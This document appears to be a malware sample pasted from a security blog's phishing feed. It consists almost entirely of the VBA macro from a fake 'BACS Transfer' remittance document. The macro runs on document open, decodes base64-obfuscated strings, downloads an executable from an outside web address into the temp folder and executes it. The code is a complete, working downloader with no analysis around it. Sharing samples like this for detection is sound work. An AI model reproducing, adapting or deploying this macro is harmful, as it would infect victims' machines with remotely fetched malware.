
BACS Transfer : Remittance 2

Jan 30th, 2015
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  2. Sanesecurity ClamAV blog: zero hour malware, phishing and scams
  3. A hopefully interesting blog from the world of zero hour malware, phishing, scams and spams
  5. Attribute VB_Name = "ThisDocument"
  6. Attribute VB_Base = "1Normal.ThisDocument"
  7. Attribute VB_GlobalNameSpace = False
  8. Attribute VB_Creatable = False
  9. Attribute VB_PredeclaredId = True
  10. Attribute VB_Exposed = True
  11. Attribute VB_TemplateDerived = True
  12. Attribute VB_Customizable = True
  13. Private Const DYAVRU2O7CQK = "XGlIR2RzZi5leGU="
  14. Private Const u4UPbupdHqn = "VEVNUA=="
  15. Private Const JGYEERm = "aHR0cDovL3N0eWxpc2htYWxkaXZlcy5jb20vanMvYmluLmV4ZQ=="
  16. Private Const WbqiAH = DYAVRU2O7CQK
  17. Private Const aXpVWjFOR = u4UPbupdHqn
  18. Private Const UUMbhwG = "U2hlbGwuQXBwbGljYXRpb24="
  19. Private Const s1tNlT1AWf = ""
  20. Private Const FTKZS = "R0VU"
  21. Private Const jSr7Aw = "TVNYTUwyLlhNTEhUVFA="
  22. Private Const LZKV = ""
  23. Private Const JLR = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  25. Sub iwpHOuE6r()
  26. nJFIm
  27. End Sub
  28. Sub eODC7ApCVQ()
  29. iwpHOuE6r
  30. End Sub
  31. Sub autoopen()
  32. iwpHOuE6r
  33. End Sub
  34. Function JyXsorj(ByVal sdfwefwef As String, ByVal pNJKBjkdsf As String) As Boolean
  35. Dim hUIGGYdfg As Object, i As Long, GYUbjsdf As Long, hjjjjjb() As Byte
  38. Set hUIGGYdfg = CreateObject(NsCj(jSr7Aw))
  39. hUIGGYdfg.Open NsCj(FTKZS), sdfwefwef, False
  40. hUIGGYdfg.Send
  42. hjjjjjb = hUIGGYdfg.responseBody
  44. GYUbjsdf = FreeFile
  45. Open pNJKBjkdsf For Binary Access Write As #GYUbjsdf
  46. Put #GYUbjsdf, , hjjjjjb
  47. Close #GYUbjsdf
  49. Set hUIGGYdfg = Nothing
  51. Set sdfsdfsd = CreateObject(NsCj(UUMbhwG))
  52. sdfsdfsd.Open Environ(NsCj(aXpVWjFOR)) & NsCj(WbqiAH)
  53. End Function
  54. Sub nJFIm()
  55. FFewr43 = NsCj(JGYEERm)
  56. JyXsorj FFewr43, Environ(NsCj(aXpVWjFOR)) & NsCj(WbqiAH)
  58. End Sub
  59. Public Function NsCj(strInput As String) As String
  61. On Error Resume Next
  62. On Local Error Resume Next
  63. Dim arrChars64() As Byte
  64. Dim arrChars64Rev() As Byte
  65. Dim arrInput() As Byte
  66. Dim arrOutput() As Byte
  67. Dim arrChar(4) As Integer
  68. Dim intLen As Long
  69. Dim intDelta As Long
  70. Dim i As Long
  71. Dim j As Long
  72. Const Base64 = JLR
  73. arrChars64() = StrConv(Base64, vbFromUnicode)
  74. ReDim arrChars64Rev(255)
  75. For i = 0 To UBound(arrChars64)
  76. arrChars64Rev(arrChars64(i)) = i
  77. Next i
  78. intLen = Len(strInput)
  79. If intLen = 0 Then Exit Function
  80. intDelta = intLen Mod 4
  81. If intDelta > 0 Then
  82. strInput = strInput + String$(4 - intDelta, 0)
  83. intLen = Len(strInput)
  84. End If
  85. arrInput() = StrConv(strInput, vbFromUnicode)
  86. ReDim arrOutput(((intLen + 1) / 4) * 3)
  87. For i = 0 To UBound(arrInput) Step 4
  88. arrChar(1) = arrChars64Rev(arrInput(i))
  89. arrChar(2) = arrChars64Rev(arrInput(i + 1))
  90. arrChar(3) = arrChars64Rev(arrInput(i + 2))
  91. arrChar(4) = arrChars64Rev(arrInput(i + 3))
  92. arrOutput(j) = ((arrChar(1) * 4 + Int(arrChar(2) / 16)) And 255)
  93. j = j + 1
  94. arrOutput(j) = ((arrChar(2) * 16 + Int(arrChar(3) / 4)) And 255)
  95. j = j + 1
  96. arrOutput(j) = ((arrChar(3) * 64 + arrChar(4)) And 255)
  97. j = j + 1
  98. Next
  99. NsCj = Replace(StrConv(arrOutput, vbUnicode), vbNullChar, "")
  100. End Function
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